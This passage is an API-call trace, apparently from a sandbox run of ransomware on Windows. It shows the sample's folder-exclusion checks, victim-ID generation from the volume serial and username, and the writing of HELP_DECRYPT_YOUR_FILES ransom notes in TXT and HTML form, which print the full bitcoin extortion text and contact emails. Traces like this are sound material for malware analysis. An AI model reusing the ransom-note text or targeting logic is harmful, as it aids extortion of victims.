	[0166.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="application data") returned 0x0
	[0166.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="winnt") returned 0x0
	[0166.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="tmp") returned 0x0
	[0166.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.130] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="cache") returned 0x0
	[0166.130] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.130] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.130] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.130] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="webcache") returned 0x0
	[0166.130] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="inetcache") returned 0x0
	[0166.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="nvidia") returned 0x0
	[0166.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="packages") returned 0x0
	[0166.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.131] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="cookies") returned 0x0
	[0166.131] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.132] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="programdata") returned 0x0
	[0166.132] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.132] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.132] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7c88b5be, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.132] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.132] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c88b5be, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7c88b5be, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c8b16b4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.132] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c88b5be, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7c88b5be, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7c88b5be, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.132] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1
	[0166.133] lstrcmpW (lpString1="Packages", lpString2="..") returned 1
	[0166.133] lstrcmpW (lpString1="Packages", lpString2=".") returned 1
	[0166.133] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog"
	[0166.133] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\"
	[0166.133] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\", lpString2="Packages" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages"
	[0166.133] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages"
	[0166.133] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\"
	[0166.133] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\"
	[0166.134] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*"
	[0166.134] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xfc9e8858, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb95b0
	[0166.134] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*") returned 72
	[0166.134] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.134] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*", cchLength=0x48 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*") returned 0x48
	[0166.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="windows") returned 0x0
	[0166.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="boot") returned 0x0
	[0166.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.135] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="system volume information") returned 0x0
	[0166.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="temp") returned 0x0
	[0166.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="program files") returned 0x0
	[0166.136] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.136] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.137] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="appdata") returned 0x0
	[0166.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.137] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="application data") returned 0x0
	[0166.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.137] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="winnt") returned 0x0
	[0166.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.138] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="tmp") returned 0x0
	[0166.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.138] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="cache") returned 0x0
	[0166.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.138] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.139] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="webcache") returned 0x0
	[0166.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.139] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="inetcache") returned 0x0
	[0166.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.139] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="nvidia") returned 0x0
	[0166.139] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.139] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="packages") returned="packages\\*.*"
	[0166.139] FindClose (in: hFindFile=0xfb95b0 | out: hFindFile=0xfb95b0) returned 1
	[0166.140] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages"
	[0166.140] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*"
	[0166.147] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.147] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.147] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\HELP_DECRYPT_YOUR_FILES.TXT") returned 96
	[0166.147] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.148] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.148] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.152] CloseHandle (hObject=0x39c) returned 1
	[0166.153] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.153] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.154] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0166.155] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.155] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.155] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.155] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.155] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0166.156] CloseHandle (hObject=0x39c) returned 1
	[0166.163] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.164] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.164] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.164] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\HELP_DECRYPT_YOUR_FILES.HTML") returned 97
	[0166.164] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.165] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.165] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0166.168] CloseHandle (hObject=0x39c) returned 1
	[0166.168] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.169] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.169] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0166.170] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.171] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0166.171] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.171] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.171] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0166.173] CloseHandle (hObject=0x39c) returned 1
	[0166.173] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xfc9e8858, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x7c923dd7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb91b0
	[0166.173] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*") returned 72
	[0166.174] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.174] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*.*", cchLength=0x48 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*") returned 0x48
	[0166.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.174] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="windows") returned 0x0
	[0166.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.174] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="boot") returned 0x0
	[0166.174] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="system volume information") returned 0x0
	[0166.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.175] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="temp") returned 0x0
	[0166.175] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="program files") returned 0x0
	[0166.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="appdata") returned 0x0
	[0166.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.176] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="application data") returned 0x0
	[0166.176] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="winnt") returned 0x0
	[0166.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="tmp") returned 0x0
	[0166.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="cache") returned 0x0
	[0166.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.177] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.177] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="webcache") returned 0x0
	[0166.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="inetcache") returned 0x0
	[0166.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="nvidia") returned 0x0
	[0166.178] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.178] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\*.*", lpSrch="packages") returned="packages\\*.*"
	[0166.179] FindClose (in: hFindFile=0xfb91b0 | out: hFindFile=0xfb91b0) returned 1
